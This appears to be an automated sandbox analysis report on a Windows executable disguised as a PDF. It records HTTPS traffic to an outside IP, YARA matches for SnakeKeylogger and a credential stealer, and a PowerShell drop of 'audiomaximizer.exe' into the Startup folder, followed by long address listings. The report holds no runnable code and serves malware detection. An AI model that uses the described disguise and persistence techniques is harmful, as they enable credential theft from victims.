Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.PDF-3093900299039 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.audiomaximizer.exe.333b070.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.audiomaximizer.exe.3338830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.2a98348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.2a9ab88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_027CD304	0_2_027CD304
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DD65B0	0_2_04DD65B0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DDC0C0	0_2_04DDC0C0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DDB358	0_2_04DDB358
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DDFB18	0_2_04DDFB18
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DD0040	0_2_04DD0040
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_04DD0007	0_2_04DD0007
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CEE459	0_2_06CEE459
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CE1C80	0_2_06CE1C80
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CE2B88	0_2_06CE2B88
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2C146	3_2_01D2C146
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2A088	3_2_01D2A088
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D25370	3_2_01D25370
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2D278	3_2_01D2D278
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2C468	3_2_01D2C468
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2C738	3_2_01D2C738
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2E988	3_2_01D2E988
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D269A0	3_2_01D269A0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2CA08	3_2_01D2CA08
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2CCD8	3_2_01D2CCD8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D26FC8	3_2_01D26FC8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2CFAA	3_2_01D2CFAA
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D23E09	3_2_01D23E09
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D229EC	3_2_01D229EC
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D239ED	3_2_01D239ED
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D2E97A	3_2_01D2E97A
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_01D23AA1	3_2_01D23AA1
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6A468	3_2_05B6A468
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B60B30	3_2_05B60B30
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6AB50	3_2_05B6AB50
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B69D10	3_2_05B69D10
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6E5D0	3_2_05B6E5D0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6E5C0	3_2_05B6E5C0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6A462	3_2_05B6A462
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6E178	3_2_05B6E178
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6E16B	3_2_05B6E16B
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B60006	3_2_05B60006
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B60040	3_2_05B60040
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B68268	3_2_05B68268
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B68258	3_2_05B68258
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6EFBA	3_2_05B6EFBA
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6EFB8	3_2_05B6EFB8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B60B21	3_2_05B60B21
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6EB60	3_2_05B6EB60
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6EB50	3_2_05B6EB50
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6F410	3_2_05B6F410
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6F401	3_2_05B6F401
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6D470	3_2_05B6D470
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6D463	3_2_05B6D463
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6DD20	3_2_05B6DD20
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6DD17	3_2_05B6DD17
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B69D00	3_2_05B69D00
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6D8B8	3_2_05B6D8B8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6D8C8	3_2_05B6D8C8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6F86A	3_2_05B6F86A
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_05B6F868	3_2_05B6F868
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_0761D128	3_2_0761D128
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_07613198	3_2_07613198
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_0761D118	3_2_0761D118
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_0761A0E8	3_2_0761A0E8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_0761A0F8	3_2_0761A0F8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_08A5B908	3_2_08A5B908
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 5_2_0176D304	5_2_0176D304
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 5_2_0176B4C8	5_2_0176B4C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168C146	8_2_0168C146
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168A088	8_2_0168A088
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_01685370	8_2_01685370
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168D278	8_2_0168D278
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168C468	8_2_0168C468
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168C738	8_2_0168C738
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_016869A0	8_2_016869A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168E988	8_2_0168E988
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168CA08	8_2_0168CA08
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168CCD8	8_2_0168CCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_01686FC8	8_2_01686FC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168CFA9	8_2_0168CFA9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_01683E09	8_2_01683E09
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168F960	8_2_0168F960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_0168E97A	8_2_0168E97A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_01683AB1	8_2_01683AB1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0A468	8_2_05D0A468
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0AB50	8_2_05D0AB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D09D10	8_2_05D09D10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0E5D0	8_2_05D0E5D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0E5C0	8_2_05D0E5C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0A462	8_2_05D0A462
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0E178	8_2_05D0E178
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0E169	8_2_05D0E169
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D00040	8_2_05D00040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D00007	8_2_05D00007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D08258	8_2_05D08258
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D08268	8_2_05D08268
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0EFB8	8_2_05D0EFB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0EB50	8_2_05D0EB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0EB60	8_2_05D0EB60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D00B30	8_2_05D00B30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D00B21	8_2_05D00B21
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0D470	8_2_05D0D470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0F410	8_2_05D0F410
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0DD19	8_2_05D0DD19
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D09D00	8_2_05D09D00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0DD20	8_2_05D0DD20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0D8C8	8_2_05D0D8C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_05D0F868	8_2_05D0F868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9E08	8_2_06ED9E08
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED2680	8_2_06ED2680
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED0E98	8_2_06ED0E98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED0E97	8_2_06ED0E97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED3E68	8_2_06ED3E68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED267B	8_2_06ED267B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5647	8_2_06ED5647
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED3E57	8_2_06ED3E57
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5650	8_2_06ED5650
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED6E29	8_2_06ED6E29
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8620	8_2_06ED8620
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED6E38	8_2_06ED6E38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8611	8_2_06ED8611
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5FE0	8_2_06ED5FE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED47F8	8_2_06ED47F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED47F7	8_2_06ED47F7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED77C8	8_2_06ED77C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5FDB	8_2_06ED5FDB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8FA1	8_2_06ED8FA1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED77B8	8_2_06ED77B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8FB0	8_2_06ED8FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06EDB700	8_2_06EDB700
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1CE9	8_2_06ED1CE9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED04F7	8_2_06ED04F7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1CF0	8_2_06ED1CF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED4CC0	8_2_06ED4CC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED34D8	8_2_06ED34D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED34D7	8_2_06ED34D7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED64A8	8_2_06ED64A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED64A7	8_2_06ED64A7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED4CBF	8_2_06ED4CBF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED7C90	8_2_06ED7C90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9467	8_2_06ED9467
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED7C7F	8_2_06ED7C7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9478	8_2_06ED9478
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED9DF7	8_2_06ED9DF7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED0508	8_2_06ED0508
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED72EF	8_2_06ED72EF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8AE8	8_2_06ED8AE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED8AD9	8_2_06ED8AD9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1360	8_2_06ED1360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED2B48	8_2_06ED2B48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED2B47	8_2_06ED2B47
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1357	8_2_06ED1357
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED432B	8_2_06ED432B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED4330	8_2_06ED4330
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED7300	8_2_06ED7300
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5B18	8_2_06ED5B18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5B17	8_2_06ED5B17
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED0040	8_2_06ED0040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1828	8_2_06ED1828
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED1827	8_2_06ED1827
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED300B	8_2_06ED300B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED0006	8_2_06ED0006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED3010	8_2_06ED3010
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED09C7	8_2_06ED09C7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED09D0	8_2_06ED09D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED39A0	8_2_06ED39A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED21B8	8_2_06ED21B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED21B7	8_2_06ED21B7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_06ED5188	8_2_06ED5188
